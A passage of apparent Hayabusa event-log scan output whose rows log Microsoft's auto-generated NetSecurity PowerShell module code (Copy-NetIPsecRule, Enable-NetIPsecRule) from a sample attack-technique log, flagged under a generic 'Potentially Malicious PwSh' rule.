[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewP",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"olicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 